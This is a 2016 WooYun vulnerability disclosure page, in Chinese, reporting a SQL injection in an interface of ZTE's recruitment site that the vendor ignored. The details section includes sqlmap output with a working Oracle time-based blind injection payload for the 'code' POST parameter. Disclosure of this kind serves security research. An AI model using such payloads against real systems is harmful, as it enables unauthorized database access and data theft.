中兴通讯招聘官网某处接口SQL注入漏洞

漏洞概要 关注数(3) 关注此漏洞

缺陷编号： WooYun-2016-195962

漏洞标题： 中兴通讯招聘官网某处接口SQL注入漏洞

相关厂商： 中兴通讯股份有限公司

漏洞作者： Looke

提交时间： 2016-04-13 21:01

公开时间： 2016-04-14 08:49

漏洞类型： SQL注射漏洞

危害等级： 高

自评Rank： 20

漏洞状态： 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签： 无

0人收藏

漏洞详情

披露状态：

2016-04-13： 细节已通知厂商并且等待厂商处理中
2016-04-13： 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-04-14： 厂商已经主动忽略漏洞，细节向公众公开

简要描述：

中兴通讯招聘官网某处接口SQL注入漏洞

详细说明：

---
 Parameter: #1* ((custom) POST)
     Type: AND/OR time-based blind
     Title: Oracle AND time-based blind (heavy query - comment)
     Payload: code=230710196211270029' AND 3147=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_U
 SERS T3,ALL_USERS T4,ALL_USERS T5)--&dopost=status
 ---
 [21:26:43] [INFO] the back-end DBMS is Oracle
 back-end DBMS: Oracle

漏洞证明：

修复方案：

版权声明：转载请注明来源 Looke@乌云

漏洞回应